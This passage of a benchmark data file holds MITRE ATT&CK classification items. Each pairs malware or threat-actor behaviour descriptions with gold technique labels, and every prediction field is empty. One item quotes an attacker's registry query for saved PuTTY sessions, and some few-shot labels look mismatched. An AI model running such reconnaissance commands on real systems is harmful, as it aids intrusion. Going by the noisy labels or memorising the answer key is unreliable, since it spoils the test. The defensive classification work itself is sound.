Data Encrypted for Impact\n", + "input": "Valak has the ability to decode and decrypt downloaded files.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DCSrv has a function to sleep for two hours before rebooting the system.\n\t - T1529: System Shutdown/Reboot\n- Text: Drovorub can use kernel modules to establish persistence.\n\t - T1547.006: Boot or Logon Autostart Execution - Kernel Modules and Extensions\n- Text: HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data.\n\t - T1561.001: Disk Wipe - Disk Content Wipe\n", + "input": "Shamoon will reboot the infected system once the wiping functionality has been completed.", + "gold": "- T1529: System Shutdown/Reboot", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ursnif has used \"CreateProcessW\" to create child processes.\n\t - T1106: Native API\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n- Text: employs the same encoding scheme as for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.\n\t - T1486: Data Encrypted for Impact\n", + "input": "DCSrv has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WellMail can archive files on the compromised host.\n\t - T1560: Archive Collected Data\n- Text: APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1021.004: Remote Services - SSH\n\t - T1018: Remote System Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n- Text: Epic compresses the collected data with bzip2 before sending it to the C2 server.\n\t - T1560.002: Archive Collected Data - Archive via Library\n", + "input": "Dtrack packs collected data into a password protected archive.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RATANKBA uses the \"net user\" command.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Stuxnet enumerates user accounts of the domain.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Flagpro has been used to execute the \"net localgroup administrators\" command on a targeted system.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", + "input": "USBferry can use \"net user\" to gather information about local accounts.", + "gold": "- T1087.001: Account Discovery - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A variant uses DLL search order hijacking.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n- Text: Version.dll and jucheck.exe are both important pieces of the execution chain used to launch BOOMMIC. Jucheck.exe is a legitimate java binary used to check for any updates. This file will load version.dll upon its execution. Version.dll is an unsigned and modified copy of a signed legitimate Windows DLL, normally found under %SYSTEMROOT%\\System32, but retains its PE header. An additional import was added to the modified version.dll, which imports the malicious function from javafx_font.dll.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", + "input": "Prikormka uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.", + "gold": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY can send a file containing victim system information to C2.\n\t - T1005: Data from Local System\n- Text: This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive\n\t - T1083: File and Directory Discovery\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam\n\t - T1070.004: Indicator Removal - File Deletion\n", + "input": "BLINDINGCAN has uploaded files from victim machines.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BUBBLEWRAP can communicate using HTTP or HTTPS.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Comnie uses HTTP for C2 communication.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.\n\t - T1106: Native API\n- Text: Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the \"GetTextCharset\" function.\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.\n\t - T1547: Boot or Logon Autostart Execution\n", + "input": "Misdat has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username\n\t - T1047: Windows Management Instrumentation\n\t - T1082: System Information Discovery\n\t - T1016: System Network Configuration Discovery\n- Text: Watch on Fox News: Hackers may use fake Netflix app to spy on users As users have become more attached to their mobile devices, they want everything on those devices\n\t - T1120: Peripheral Device Discovery\n\t - T1087: Account Discovery\n- Text: provides access to the Windows Registry, which can be used to gather information.\n\t - T1012: Query Registry\n", + "input": "JHUHUGIT obtains a build identifier as well as victim hard drive information from Windows registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\". Another JHUHUGIT variant gathers the victim storage volume serial number and the storage device name.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.\n\t - T1176: Browser Extensions\n- Text: has used WinSCP to exfiltrate data from a targeted organization over FTP.\n\t - T1048: Exfiltration Over Alternative Protocol\n", + "input": "PoetRAT has used a Python tool named Browdec.exe to steal browser credentials.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: MBR + overwrite/wipe\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n", + "input": "Shamoon copies an executable payload to the target system by using SMB/Windows Admin Shares and then scheduling an unnamed task to execute the malware.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: By using DoH, attackers can hide DNS queries from C&C domains. If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed. \n\t - T1572: Protocol Tunneling\n- Text: Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.\n\t - T1571: Non-Standard Port\n\t - T1043: Commonly Used Port\n", + "input": "InvisiMole can mimic HTTP protocol with custom HTTP \u201cverbs\u201d HIDE, ZVVP, and NOP.", + "gold": "- T1001.003: Data Obfuscation - Protocol Impersonation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.\n\t - T1119: Automated Collection\n- Text: Hikit has the ability to create a remote shell and run given commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: 2) The directory \u201cout\u201d is created in the user\u2019s %AppData% folder. 5) The screenshot is then copied over to the newly created \u201cout\u201d directory of the system where the batch script was executed. 6) In one instance, DHS observed an \u201cout.zip\u201d file created\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Comnie executes a batch script to store discovery information in %TEMP%\\info.dat and then uploads the temporarily file to the remote C2 server.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conti has the ability to discover hosts on a target network.\n\t - T1018: Remote System Discovery\n- Text: Empire can find shared drives on the local system.\n\t - T1135: Network Share Discovery\n- Text: Pony has used the \"NetUserEnum\" function to enumerate local accounts.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "USBferry can use \"net view\" to gather information about remote systems.", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: SMOKEDHAM has encoded its C2 traffic with Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "OceanSalt can encode data with a NOT operation before sending the data to the control server.", + "gold": "- T1132.002: Data Encoding - Non-Standard Encoding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory.\n\t - T1083: File and Directory Discovery\n- Text: OilRig has run \"hostname\" and \"systeminfo\" on a victim.\n\t - T1082: System Information Discovery\n- Text: Tonto Team has used tools such as NBTscan to enumerate network shares.\n\t - T1135: Network Share Discovery\n", + "input": "FunnyDream can enumerate all logical drives on a targeted machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user.\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: TeamTNT has added batch scripts to the startup folder.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Bundlore can persist via a LaunchDaemon.\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n", + "input": "Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.", + "gold": "- T1543.001: Create or Modify System Process - Launch Agent", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. The actors commonly moved laterally within victim environments using compromised accounts\u2014both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. The actors used the Windows net use command to connect to Windows admin shares to move laterally\n\t - T1078.002: Valid Accounts - Domain Accounts\n- Text: Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.\n\t - T1649: Steal or Forge Authentication Certificates\n- Text: PoshC2 can enumerate local and domain user account information.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "TA505 has used stolen domain admin accounts to compromise additional hosts.", + "gold": "- T1078.002: Valid Accounts - Domain Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After moving through the network and identifying assets to target, the next step would be to gather key data. At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).\n\t - T1113: Screen Capture\n\t - T1056: Input Capture\n- Text: TeamTNT has searched for attached VGA devices using lspci.\n\t - T1120: Peripheral Device Discovery\n- Text: Turla RPC backdoors can collect files from USB thumb drives.\n\t - T1025: Data from Removable Media\n", + "input": "Ramsay can take screenshots every 30 seconds as well as when an external removable storage device is connected.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MailSniper can be used to obtain account names from Exchange and Office 365 using the \"Get-GlobalAddressList\" cmdlet.\n\t - T1087.003: Account Discovery - Email Account\n- Text: Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: BloodHound can collect information about domain users, including identification of domain admin accounts.\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "menuPass has used the Csvde tool to collect Active Directory files and data.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TinyTurla has the ability to encrypt C2 traffic with SSL/TLS.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: SynAck encrypts the victims machine followed by asking the victim to pay a ransom.\n\t - T1486: Data Encrypted for Impact\n", + "input": "Cyclops Blink can encrypt C2 messages with AES-256-CBC sent underneath TLS. OpenSSL library functions are also used to encrypt each message using a randomly generated key and IV, which are then encrypted using a hard-coded RSA public key.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hildegard has used history -c to clear script shell logs.\n\t - T1070.003: Indicator Removal - Clear Command History\n- Text: The VBScript also uploads the output of the provided batch scripts to the command and control (C2) server, which provides threat actors a functional remote shell to the system\n\t - T1119: Automated Collection\n- Text: After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.\n\t - T1539: Steal Web Session Cookie\n\t - T1113: Screen Capture\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1020.001: Automated Exfiltration - Traffic Duplication\n\t - T1056.003: Input Capture - Web Portal Capture\n", + "input": "Stolen Pencil has a tool to log keystrokes to %userprofile%\\appdata\\roaming\\apach.{txt,log}.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pillowmint has used shellcode which reads code stored in the registry keys \"\\REGISTRY\\SOFTWARE\\Microsoft\\DRM\" using the native Windows API as well as read \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\" as part of its C2.\n\t - T1012: Query Registry\n- Text: A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.\n\t - T1033: System Owner/User Discovery\n- Text: Chimera has used compromised domain accounts to gain access to the target environment.\n\t - T1078.002: Valid Accounts - Domain Accounts\n", + "input": "During Operation Wocao, the threat actors executed `/c cd /d c:\\windows\\temp\\ & reg query HKEY_CURRENT_USER\\Software\\\\PuTTY\\Sessions\\` to detect recent PuTTY sessions, likely to further lateral movement.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: RCSession has used a file named English.rtf to appear benign on victim hosts.\n\t - T1036: Masquerading\n- Text: Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "APT39 has used malware disguised as Mozilla Firefox and a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fox Kitten has used RDP to log in and move laterally in the target environment.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: Victim Registration SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com\n\t - T1071: Application Layer Protocol\n- Text: BUBBLEWRAP can communicate using SOCKS.\n\t - T1095: Non-Application Layer Protocol\n", + "input": "WarzoneRAT has the ability to control an infected PC using RDP.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts.\n\t - T1021.006: Remote Services - Windows Remote Management\n- Text: Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process\n\t - T1569.002: System Services - Service Execution\n- Text: The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, 